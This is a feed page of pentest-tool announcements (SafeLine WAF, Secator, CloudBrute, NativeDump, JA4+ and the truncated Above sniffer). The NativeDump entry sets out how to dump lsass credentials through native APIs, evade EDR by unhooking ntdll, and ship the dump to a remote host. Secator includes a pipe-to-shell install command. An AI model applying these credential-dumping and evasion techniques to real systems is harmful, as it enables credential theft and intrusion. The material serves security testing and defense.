FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
☐ β˜† βœ‡ KitPloit - PenTest Tools!

SafeLine - Serve As A Reverse Proxy To Protect Your Web Services From Attacks And Exploits

By: Zion3R β€” September 24th 2024 at 11:30


SafeLine is a self-hosted WAF(Web Application Firewall) to protect your web apps from attacks and exploits.

A web application firewall helps protect web apps by filtering and monitoring HTTP traffic between a web application and the Internet. It typically protects web apps from attacks such as SQL injection, XSS, code injection, os command injection, CRLF injection, ldap injection, xpath injection, RCE, XXE, SSRF, path traversal, backdoor, bruteforce, http-flood, bot abused, among others.


How It Works


By deploying a WAF in front of a web application, a shield is placed between the web application and the Internet. While a proxy server protects a client machine's identity by using an intermediary, a WAF is a type of reverse-proxy, protecting the server from exposure by having clients pass through the WAF before reaching the server.

A WAF protects your web apps by filtering, monitoring, and blocking any malicious HTTP/S traffic traveling to the web application, and prevents any unauthorized data from leaving the app. It does this by adhering to a set of policies that help determine what traffic is malicious and what traffic is safe. Just as a proxy server acts as an intermediary to protect the identity of a client, a WAF operates in similar fashion but acting as an reverse proxy intermediary that protects the web app server from a potentially malicious client.

its core capabilities include:

  • Defenses for web attacks
  • Proactive bot abused defense
  • HTML & JS code encryption
  • IP-based rate limiting
  • Web Access Control List

Screenshots







Get Live Demo

FEATURES

List of the main features as follows:

  • Block Web Attacks
  • It defenses for all of web attacks, such as SQL injection, XSS, code injection, os command injection, CRLF injection, XXE, SSRF, path traversal and so on.
  • Rate Limiting
  • Defend your web apps against DoS attacks, bruteforce attempts, traffic surges, and other types of abuse by throttling traffic that exceeds defined limits.
  • Anti-Bot Challenge
  • Anti-Bot challenges to protect your website from bot attacks, humen users will be allowed, crawlers and bots will be blocked.
  • Authentication Challenge
  • When authentication challenge turned on, visitors need to enter the password, otherwise they will be blocked.
  • Dynamic Protection
  • When dynamic protection turned on, html and js codes in your web server will be dynamically encrypted by each time you visit.


☐ β˜† βœ‡ KitPloit - PenTest Tools!

Secator - The Pentester'S Swiss Knife

By: Zion3R β€” September 22nd 2024 at 11:30


secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.


Features

  • Curated list of commands

  • Unified input options

  • Unified output schema

  • CLI and library usage

  • Distributed options with Celery

  • Complexity from simple tasks to complex workflows

  • Customizable


Supported tools

secator integrates the following tools:

Name Description Category
httpx Fast HTTP prober. http
cariddi Fast crawler and endpoint secrets / api keys / tokens matcher. http/crawler
gau Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). http/crawler
gospider Fast web spider written in Go. http/crawler
katana Next-generation crawling and spidering framework. http/crawler
dirsearch Web path discovery. http/fuzzer
feroxbuster Simple, fast, recursive content discovery tool written in Rust. http/fuzzer
ffuf Fast web fuzzer written in Go. http/fuzzer
h8mail Email OSINT and breach hunting tool. osint
dnsx Fast and multi-purpose DNS toolkit designed for running DNS queries. recon/dns
dnsxbrute Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). recon/dns
subfinder Fast subdomain finder. recon/dns
fping Find alive hosts on local networks. recon/ip
mapcidr Expand CIDR ranges into IPs. recon/ip
naabu Fast port discovery tool. recon/port
maigret Hunt for user accounts across many websites. recon/user
gf A wrapper around grep to avoid typing common patterns. tagger
grype A vulnerability scanner for container images and filesystems. vuln/code
dalfox Powerful XSS scanning tool and parameter analyzer. vuln/http
msfconsole CLI to access and work with the Metasploit Framework. vuln/http
wpscan WordPress Security Scanner vuln/multi
nmap Vulnerability scanner using NSE scripts. vuln/multi
nuclei Fast and customisable vulnerability scanner based on simple YAML based DSL. vuln/multi
searchsploit Exploit searcher. exploit/search

Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).

Installation

Installing secator

Pipx
pipx install secator
Pip
pip install secator
Bash
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
Docker
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
The volume mount -v is necessary to save all secator reports to your host machine, and--net=host is recommended to grant full access to the host network. You can alias this command to run it easier:
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
Now you can run secator like if it was installed on baremetal:
secator --help
Docker Compose
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help

Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.

Installing languages

secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.

We provide utilities to install required languages if you don't manage them externally:

Go
secator install langs go
Ruby
secator install langs ruby

Installing tools

secator does not install any of the external tools it supports by default.

We provide utilities to install or update each supported tool which should work on all systems supporting apt:

All tools
secator install tools
Specific tools
secator install tools <TOOL_NAME>
For instance, to install `httpx`, use:
secator install tools httpx

Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.

Installing addons

secator comes installed with the minimum amount of dependencies.

There are several addons available for secator:

worker Add support for Celery workers (see [Distributed runs with Celery](https://docs.freelabz.com/in-depth/distributed-runs-with-celery)).
secator install addons worker
google Add support for Google Drive exporter (`-o gdrive`).
secator install addons google
mongodb Add support for MongoDB driver (`-driver mongodb`).
secator install addons mongodb
redis Add support for Redis backend (Celery).
secator install addons redis
dev Add development tools like `coverage` and `flake8` required for running tests.
secator install addons dev
trace Add tracing tools like `memray` and `pyinstrument` required for tracing functions.
secator install addons trace
build Add `hatch` for building and publishing the PyPI package.
secator install addons build

Install CVEs

secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:

secator install cves

Checking installation health

To figure out which languages or tools are installed on your system (along with their version):

secator health

Usage

secator --help


Usage examples

Run a fuzzing task (ffuf):

secator x ffuf http://testphp.vulnweb.com/FUZZ

Run a url crawl workflow:

secator w url_crawl http://testphp.vulnweb.com

Run a host scan:

secator s host mydomain.com

and more... to list all tasks / workflows / scans that you can use:

secator x --help
secator w --help
secator s --help

Learn more

To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube



☐ β˜† βœ‡ KitPloit - PenTest Tools!

CloudBrute - Awesome Cloud Enumerator

By: Zion3R β€” June 25th 2024 at 12:30


A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.

The complete writeup is available. here


Motivation

we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:

  • separated wordlists
  • lack of proper concurrency
  • lack of supporting all major cloud providers
  • require authentication or keys or cloud CLI access
  • outdated endpoints and regions
  • Incorrect file storage detection
  • lack support for proxies (useful for bypassing region restrictions)
  • lack support for user agent randomization (useful for bypassing rare restrictions)
  • hard to use, poorly configured

Features

  • Cloud detection (IPINFO API and Source Code)
  • Supports all major providers
  • Black-Box (unauthenticated)
  • Fast (concurrent)
  • Modular and easily customizable
  • Cross Platform (windows, linux, mac)
  • User-Agent Randomization
  • Proxy Randomization (HTTP, Socks5)

Supported Cloud Providers

Microsoft: - Storage - Apps

Amazon: - Storage - Apps

Google: - Storage - Apps

DigitalOcean: - storage

Vultr: - Storage

Linode: - Storage

Alibaba: - Storage

Version

1.0.0

Usage

Just download the latest release for your operation system and follow the usage.

To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.

It looks like this

providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY

For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.

We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.

After setting up your API key, you are ready to use CloudBrute.

 β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—   β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β•β•β•
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β•
β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β•šβ•β•β•β•β•β•β•šβ•β•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•β•β•β• β•šβ•β• β•šβ•β•β•β•β•β•β•
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]

Awesome Cloud Enumerator

Arguments:

-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config


for example

CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"

please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments

If a cloud provider not detected or want force searching on a specific provider, you can use -c option.

CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt

Dev

  • Clone the repo
  • go build -o CloudBrute main.go
  • go test internal

in action

How to contribute

  • Add a module or fix something and then pull request.
  • Share it with whomever you believe can use it.
  • Do the extra work and share your findings with community β™₯

FAQ

How to make the best out of this tool?

Read the usage.

I get errors; what should I do?

Make sure you read the usage correctly, and if you think you found a bug open an issue.

When I use proxies, I get too many errors, or it's too slow?

It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.

too fast or too slow ?

change -T (timeout) option to get best results for your run.

Credits

Inspired by every single repo listed here .



☐ β˜† βœ‡ KitPloit - PenTest Tools!

NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

By: Zion3R β€” June 16th 2024 at 17:16


NativeDump allows to dump the lsass process using only NTAPIs generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).


  • NTOpenProcessToken and NtAdjustPrivilegeToken to get the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
  • NtOpenProcess to get a handle for the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

Usage:

NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp":

The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

Some benefits of this technique are: - It does not use the well-known dbghelp!MinidumpWriteDump function - It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library - The Minidump file does not have to be written to disk, you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


Technique in detail: Creating a minimal Minidump file

After reading Minidump undocumented structures, its structure can be summed up to:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Every stream contains different information related to the process and has its own format
  • Regions: The actual bytes from the process from each memory region which can be read

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


A. Header

The header is a 32-bytes structure which can be defined in C# as:

public struct MinidumpHeader
{
public uint Signature;
public ushort Version;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}

The required values are: - Signature: Fixed value 0x504d44d ("MDMP" string) - Version: Fixed value 0xa793 (Microsoft constant MINIDUMP_VERSION) - NumberOfStreams: Fixed value 3, the three Streams required for the file - StreamDirectoryRVA: Fixed value 0x20 or 32 bytes, the size of the header


B. Stream Directory

Each entry in the Stream Directory is a 12-bytes structure so having 3 entries the size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Size;
public uint Location;
}

The field "StreamType" represents the type of stream as an integer or ID, some of the most relevant are:

ID Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 HandleOperationListStream

C. SystemInformation Stream

First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}

The required values are: - ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems - Major version, Minor version and the BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)


D. ModuleList Stream

Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C) after the SystemInformation stream and it will also have a fixed size, of 112 bytes, since it will have the entry of a single module, the only one needed for the parse to be correct: "lsasrv.dll".

The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}

As there is only one, it gets simplified to:

public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Size;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}

The required values are: - NumberOfStreams: Fixed value 1 - BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter) - Size: Obtained adding all memory region sizes since BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of other library - PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


E. Memory64List Stream

Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of modules.

public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}

Each module entry is a 16-bytes structure:

public struct Memory64Info
{
public IntPtr Address;
public IntPtr Size;
}

The required values are: - NumberOfEntries: Number of memory regions, obtained after looping memory regions - MemoryRegionsBaseAddress: Location of the start of memory regions bytes, calculated after adding the size of all 16-bytes memory entries - Address and Size: Obtained for each valid region while looping them


F. Looping memory regions

There are pre-requisites to loop the memory regions of the lsass.exe process which can be solved using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
  2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this it is possible to traverse process memory by calling: - ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region - If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populates one entry of the Memory64List stream and bytes can be added to the file - If the base address equals lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory - ntdll!NtReadVirtualMemory: Add bytes of that region to the Minidump file after the Memory64List Stream


G. Creating Minidump file

After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.




☐ β˜† βœ‡ KitPloit - PenTest Tools!

JA4+ - Suite Of Network Fingerprinting Standards

By: Zion3R β€” May 25th 2024 at 12:30


JA4+ is a suite of network FingerprintingΒ methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)


To understand how to read JA4+ fingerprints, see Technical Details

This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.

JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
NetworkMiner">Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
cloudflare.com/bots/concepts/ja3-ja4-fingerprint/">Cloudflare
fastly
with more to be announced...

Examples

Application JA4+ Fingerprints
Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
JA4S=t120300_c030_5e2616a54c73
Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
JA4S=t130200_1301_a56c5b993250
JA4X=000000000000_4f24da86fad6_bf0f0589fc03
JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
JA4X=2166164053c1_2166164053c1_30d204a01551
SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
JA4S=t130200_1302_a56c5b993250
JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
Qakbot JA4X=2bab15409345_af684594efb4_000000000000
Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
Darkgate JA4H=po10nn060000_cdb958d032b0
LummaC2 JA4H=po11nn050000_d253db9d024b
Evilginx JA4=t13d191000_9dc949149365_e7c285222651
Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

Plugins

Wireshark
Zeek
Arkime

Binaries

Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark

Download the latest JA4 binaries from: Releases.

JA4+ on Ubuntu

sudo apt install tshark
./ja4 [options] [pcap]

JA4+ on Mac

1) Install Wireshark https://www.wireshark.org/download.html which will install tshark 2) Add tshark to $PATH

ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]

JA4+ on Windows

1) Install Wireshark for Windows from https://www.wireshark.org/download.html which will install tshark.exe
tshark.exe is at the location where wireshark is installed, for example: C:\Program Files\Wireshark\thsark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd, navigate the ja4 folder

ja4 [options] [pcap]

Database

An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

In the meantime, see ja4plus-mapping.csv

Feel free to do a pull request with any JA4+ data you find.

JA4+ Details

JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

For example; GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints but with JA4, only the b part of the JA4 fingerprint changes, parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).

Current methods and implementation details:
| Full Name | Short Name | Description | |---|---|---| | JA4 | JA4 | TLS Client Fingerprinting
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting | JA4HTTP | JA4H | HTTP Client Fingerprinting | JA4Latency | JA4L | Latency Measurment / Light Distance | JA4X509 | JA4X | X509 TLS Certificate Fingerprinting | JA4SSH | JA4SSH | SSH Traffic Fingerprinting | JA4TCP | JA4T | TCP Client Fingerprinting | JA4TCPServer | JA4TS | TCP Server Response Fingerprinting | JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner

The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

To understand how to read JA4+ fingerprints, see Technical Details

Licensing

JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO

JA4+ can and is being implemented into open source tools, see the License FAQ for details.

This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

Q&A

Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.

Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions and even though TLS1.3 only supports a few ciphers, browsers and applications still support many more.

JA4+ was created by:

John Althouse, with feedback from:

Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

Contact John Althouse at john@foxio.io for licensing and questions.

Copyright (c) 2024, FoxIO



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Above - Invisible Network Protocol Sniffer

By: Zion3R β€” May 22nd 2024 at 12:30


Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


Above: Invisible network protocol sniffer
Designed for pentesters and security engineers

Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert

Disclaimer

All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

It is a specialized network security tool that helps both pentesters and security professionals.

Mechanics

